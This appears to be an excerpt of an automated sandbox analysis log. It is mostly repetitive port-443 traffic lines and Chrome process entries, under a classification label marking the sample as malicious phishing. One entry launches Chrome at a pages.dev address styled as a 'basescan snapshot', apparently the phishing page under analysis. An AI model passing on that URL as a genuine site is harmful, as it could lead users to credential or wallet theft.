            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 50783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50877 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50591 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50301 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50700
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50702
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50701
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50704
            Source: unknownNetwork traffic detected: HTTP traffic on port 50931 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50705
            Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50522 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50370 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50407 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50708
            Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 50313 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50716
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50719
            Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50534 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50718
            Source: unknownNetwork traffic detected: HTTP traffic on port 50808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50496 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50865 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 50771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50727
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 50369 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50644 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50337
            Source: unknownNetwork traffic detected: HTTP traffic on port 50420 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50339
            Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50338
            Source: unknownNetwork traffic detected: HTTP traffic on port 50546 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50331
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50330
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50333
            Source: unknownNetwork traffic detected: HTTP traffic on port 50632 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50332
            Source: unknownNetwork traffic detected: HTTP traffic on port 50873 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50335
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50334
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50305 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50348
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50347
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50349
            Source: unknownNetwork traffic detected: HTTP traffic on port 50505 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50935 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50340
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50342
            Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50341
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50344
            Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50343
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50346
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50345
            Source: unknownNetwork traffic detected: HTTP traffic on port 50673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50885 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50359
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50358
            Source: unknownNetwork traffic detected: HTTP traffic on port 50804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50351
            Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50350
            Source: unknownNetwork traffic detected: HTTP traffic on port 50558 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50353
            Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50352
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50355
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50354
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50357
            Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50356
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50861 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50360
            Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 50419 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50369
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 50685 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50361
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50364
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50363
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50366
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50365
            Source: unknownNetwork traffic detected: HTTP traffic on port 50897 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50368
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50367
            Source: unknownNetwork traffic detected: HTTP traffic on port 50923 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50371
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50370
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50779
            Source: unknownNetwork traffic detected: HTTP traffic on port 50911 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50778
            Source: unknownNetwork traffic detected: HTTP traffic on port 50571 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50770
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50774
            Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50943 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50697 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50303
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50789
            Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50308
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
            Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50309
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50780
            Source: unknownNetwork traffic detected: HTTP traffic on port 50702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50302
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50301
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50315
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50799
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
            Source: unknownNetwork traffic detected: HTTP traffic on port 50791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50317
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50316
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50319
            Source: unknownNetwork traffic detected: HTTP traffic on port 50955 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50318
            Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50790
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
            Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50619 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50310
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50797
            Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50312
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50796
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50349 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50326
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50325
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50328
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50327
            Source: unknownNetwork traffic detected: HTTP traffic on port 50828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50329
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50320
            Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50322
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50321
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50324
            Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50323
            Source: unknownNetwork traffic detected: HTTP traffic on port 50746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50514 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
            Source: unknownNetwork traffic detected: HTTP traffic on port 50915 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
            Source: unknownNetwork traffic detected: HTTP traffic on port 50389 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50400 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50652 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50550 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50903 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50549 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50481 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50940 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50665 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50365 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50640 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
            Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
            Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
            Source: unknownNetwork traffic detected: HTTP traffic on port 50353 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
            Source: unknownNetwork traffic detected: HTTP traffic on port 50456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
            Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
            Source: unknownNetwork traffic detected: HTTP traffic on port 50952 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
            Source: unknownNetwork traffic detected: HTTP traffic on port 50639 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
            Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50272
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
            Source: unknownNetwork traffic detected: HTTP traffic on port 50677 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50881 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50468 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50274
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50276
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50278
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50277
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50279
            Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50281
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50280
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50283
            Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49728 version: TLS 1.2
            Source: classification engineClassification label: mal64.phis.win@23/1171@220/47
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2240,i,4231358711642058610,15101609295661617124,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5260 --field-trial-handle=2240,i,4231358711642058610,15101609295661617124,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2240,i,4231358711642058610,15101609295661617124,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
